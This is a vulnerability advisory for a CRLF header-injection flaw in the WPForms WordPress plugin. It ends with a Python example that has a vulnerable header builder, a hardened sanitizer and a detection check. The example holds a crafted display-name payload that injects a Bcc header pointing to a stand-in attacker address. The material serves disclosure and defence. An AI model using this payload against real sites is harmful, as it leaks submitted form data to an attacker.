CVE-2026-12127
Status: Received - Intake

CRLF Injection in WPForms WordPress Plugin

Vulnerability report for CVE-2026-12127, including description, CVSS score, EPSS score, affected products, exploitability, helpful resources, and attack-flow context.

Publication date: 2026-07-01

Last updated on: 2026-07-01

Assigner: Wordfence

Description

The WPForms – Easy Form Builder for WordPress – Contact Forms, Payment Forms, Surveys, & More plugin for WordPress is vulnerable to Improper Neutralization of CRLF Sequences ('CRLF Injection') in all versions up to, and including, 1.10.2. The cause is twofold: `get_reply_to_address()` runs the Reply-To display name through smart-tag expansion with the context `'notification'` rather than `'notification-reply-to'`, which bypasses email-address validation, and `wpforms_sanitize_textarea_field()` intentionally preserves CR/LF characters, which are never stripped before the display name is concatenated into the raw `Reply-To:` mail header string. An unauthenticated attacker can therefore terminate the `Reply-To:` line and inject arbitrary additional email headers, such as `Bcc:`, into outgoing notification emails, silently blind-copying every notification email to an attacker-controlled address. Exploitation requires that a form notification is configured to use a Paragraph Text (textarea) field as the Reply-To display name via a Smart Tag.

Meta Information

Published: 2026-07-01
Last Modified: 2026-07-01
Generated: 2026-07-01
AI Q&A: 2026-07-01
EPSS Evaluated: N/A

Affected Vendors & Products

One associated CPE:

Vendor: wpforms
Product: easy_form_builder
Version / Range: up to and including 1.10.2

Exploitability

CWE-93: The product uses CRLF (carriage return line feeds) as a special element, e.g. to separate lines or records, but it does not neutralize or incorrectly neutralizes CRLF sequences from inputs.

Executive Summary

The WPForms plugin for WordPress is vulnerable to a CRLF Injection vulnerability in all versions up to and including 1.10.2. This occurs because the function get_reply_to_address() processes the Reply-To display name using smart-tag expansion with an incorrect context, bypassing email-address validation. Additionally, the sanitization function preserves CR and LF characters, which are not removed before the display name is added to the raw Reply-To email header. This allows unauthenticated attackers to inject additional email headers, such as Bcc, into outgoing notification emails.

Exploitation requires that a form notification is configured to use a Paragraph Text (textarea) field as the Reply-To display name via a Smart Tag.

Impact Analysis

This vulnerability allows unauthenticated attackers to inject arbitrary additional email headers into outgoing notification emails. For example, attackers can add a Bcc header to silently blind-copy all notification emails to an attacker-controlled address. This can lead to unauthorized disclosure of sensitive information contained in those emails.
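The mechanism described in the Description and the Impact Analysis above, shown as an added Python example that is not the WPForms plugin's own PHP code: a display name containing CR/LF is concatenated into a raw `Reply-To:` header line (the vulnerable path), the resulting header block is parsed with Python's standard RFC 5322 parser to show that the injected `Bcc:` is seen as a real header, and a hardened builder strips CR/LF and other control characters before quoting the name. All function names, `TEMPLATE_HEADERS`, and the sample submission are assumptions made for this example.

```python
"""Added example (not WPForms code): CR/LF in a Reply-To display name
becomes an injected Bcc header, and stripping CR/LF prevents it.
All helper names and the sample form data below are assumptions."""
import email
import re

# Constructed attacker input for the Paragraph Text field that the
# notification uses as the Reply-To display name. The trailing "X-Junk: "
# swallows the "<address>" the template appends, so "Bcc:" stays clean.
ATTACKER_NAME = "Jane Doe\r\nBcc: attacker@example.net\r\nX-Junk: "

# Header names the notification template itself emits (assumed set).
TEMPLATE_HEADERS = ("to", "reply-to", "subject")


def build_headers_vulnerable(display_name: str, reply_to: str, to_addr: str) -> str:
    """Mirror the flawed path: the display name is concatenated into the raw
    header string with any CR/LF it contains left intact."""
    return (
        f"To: {to_addr}\r\n"
        f"Reply-To: {display_name} <{reply_to}>\r\n"
        "Subject: New form submission\r\n"
    )


def sanitize_display_name(display_name: str) -> str:
    """Hardened: drop CR, LF and other control characters so the value cannot
    end the header line, then quote it as an RFC 5322 quoted-string."""
    cleaned = re.sub(r"[\x00-\x1f\x7f]", "", display_name).strip()
    cleaned = cleaned.replace("\\", "\\\\").replace('"', '\\"')
    return f'"{cleaned}"'


def build_headers_hardened(display_name: str, reply_to: str, to_addr: str) -> str:
    """Same template, but the display name is sanitized first."""
    return (
        f"To: {to_addr}\r\n"
        f"Reply-To: {sanitize_display_name(display_name)} <{reply_to}>\r\n"
        "Subject: New form submission\r\n"
    )


def parse_headers(raw: str) -> dict:
    """Parse a header block the way an MTA would, using the stdlib RFC 5322
    parser. Returns lower-cased header name -> list of values."""
    msg = email.message_from_string(raw + "\r\n")
    parsed: dict = {}
    for name, value in msg.items():
        parsed.setdefault(name.lower(), []).append(value)
    return parsed


def injected_headers(raw: str) -> list:
    """Detection check: header names present that the template never emits."""
    return sorted(name for name in parse_headers(raw) if name not in TEMPLATE_HEADERS)


if __name__ == "__main__":
    vulnerable = build_headers_vulnerable(ATTACKER_NAME, "site@example.org", "owner@example.org")
    hardened = build_headers_hardened(ATTACKER_NAME, "site@example.org", "owner@example.org")
    print("vulnerable, injected headers:", injected_headers(vulnerable))
    print("vulnerable, Bcc value:", parse_headers(vulnerable).get("bcc"))
    print("hardened, injected headers:", injected_headers(hardened))
    print("hardened, Reply-To:", parse_headers(hardened)["reply-to"][0])
```

`injected_headers()` doubles as a quick check for a practitioner: run it over the raw header block of a notification email captured from the site's outgoing mail (or a mail log that records full headers) and any `bcc` or unexpected name in the result indicates a successful injection. The hardened builder deliberately strips the whole C0 control range rather than only CR and LF, since a bare CR or a stray NUL can also break header framing in some mail paths.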
